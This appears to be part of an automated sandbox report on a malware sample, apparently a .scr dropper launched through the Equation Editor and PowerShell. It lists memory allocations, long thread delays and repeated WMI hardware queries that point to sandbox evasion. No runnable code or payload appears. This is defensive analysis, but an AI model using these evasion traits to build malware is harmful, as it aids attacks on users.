                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 1F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 21E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 53D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 63D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 5250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 350000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: C920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 9180000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 11220000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 12220000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: D920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 12880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 16550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 21BC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 2A8C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 26FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 2E5C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 2F5C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 2D340000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 33C10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 34C10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrMemory allocated: 36610000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 2F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 2350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 8C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 5330000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 6330000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 6700000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 7700000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 2350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 5A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: E800000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: D770000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: B320000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 11C10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 13A10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 14190000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 17CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 18CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 1F690000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 20690000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 1D900000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 21A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeMemory allocated: 232E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrThread delayed: delay time: 1200000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeThread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 767Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6695Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4228Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2084Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWindow / User API: threadDelayed 3242Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWindow / User API: threadDelayed 6562Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3180
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3055
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2170
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1467
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWindow / User API: threadDelayed 1507
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWindow / User API: threadDelayed 8309
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3328Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 3668Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 3476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3584Thread sleep count: 767 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3584Thread sleep count: 6695 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 3864Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -3600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -1000000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -59383s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -40611s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -38635s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scr TID: 4060Thread sleep time: -61358s >= -30000sJump to behavior
                    Source: C:\Windows\System32\taskeng.exe TID: 3876Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 2392Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3904Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep count: 3180 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4056Thread sleep count: 3055 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3144Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2136Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2644Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3284Thread sleep time: -720000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3620Thread sleep count: 1507 > 30
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3704Thread sleep count: 8309 > 30
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -40064s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -199876s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -99984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -99968s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -99969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -99891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -99906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -79928s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -79700s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -240189s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exe TID: 3728Thread sleep time: -159970s >= -30000s
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3716Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
